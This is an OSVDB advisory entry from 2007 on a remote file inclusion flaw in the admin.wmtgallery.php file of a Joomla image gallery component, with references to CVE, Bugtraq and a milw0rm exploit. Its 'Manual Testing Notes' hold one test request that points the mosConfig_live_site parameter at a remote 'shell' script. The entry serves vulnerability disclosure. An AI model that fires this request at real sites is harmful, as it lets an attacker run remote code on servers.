Flash Image Gallery Component for Joomla! admin.wmtgallery.php mosConfig_live_site Variable Remote File Inclusion

2007-10-07T00:00:00
ID OSVDB:38645
Type osvdb
Reporter OSVDB
Modified 2007-10-07T00:00:00

Description

Manual Testing Notes

/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=shell?

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2007-October/001823.html Mail List Post: http://www.attrition.org/pipermail/vim/2007-October/001824.html ISS X-Force ID: 37016 Generic Exploit URL: http://www.milw0rm.com/exploits/4496 FrSIRT Advisory: ADV-2007-3434 CVE-2007-5309 Bugtraq ID: 25958